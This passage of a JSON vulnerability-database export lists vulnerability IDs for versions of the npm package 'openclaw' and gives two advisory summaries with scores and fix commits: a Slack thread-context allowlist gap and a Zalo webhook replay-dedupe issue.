d-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-5rp4-cwgh-gvwq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q38j-b9g9-8yar"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92825?format=json","vulnerability_id":"VCID-q6ne-sw1r-xkd1","summary":"OpenClaw: Slack thread context could include messages from non-allowlisted senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread.\n\n## Impact\n\nA Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41358","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04376","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.0439","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41358"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41358","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41358"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context"},{"reference_url":"https://github.com/advisories/GHSA-qm77-8qjp-4vcm","reference_id":"GHSA-qm77-8qjp-4vcm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm77-8qjp-4vcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41358","GHSA-qm77-8qjp-4vcm"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q6ne-sw1r-xkd1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89752?format=json","vulnerability_id":"VCID-q9jf-srt4-fbcg","summary":"OpenClaw: Zalo replay dedupe cache could suppress events across authenticated webhook targets\n## Summary\n\nBefore OpenClaw 2026.3.31, the Zalo webhook replay-dedupe cache was shared across authenticated webhook targets and keyed too broadly. In multi-account deployments, a replay seen on one account could suppress a legitimate event on another account if `event_name` and `message_id` matched.\n\n## Impact\n\nAn attacker who controlled one authenticated Zalo webhook path in a multi-account gateway deployment could cause silent message suppression on a different Zalo account sharing that gateway. This was an availability issue; it did not provide cross-account authentication or data access.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.19, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — scope webhook replay dedupe per target\n- `7cea7c29705b188b464cc9cdc107c275b94b2a72` — follow-up hardening to scope replay dedupe by path and account\n\n## Release Process Note\n\nThe initial fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains follow-up hardening for the same surface.\n\nThanks @nexrin for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v"},{"reference_url":"https://github.com/advisories/GHSA-fqrj-m88p-qf3v","reference_id":"GHSA-fqrj-m88p-qf3v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fqrj-m88p-qf3v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfd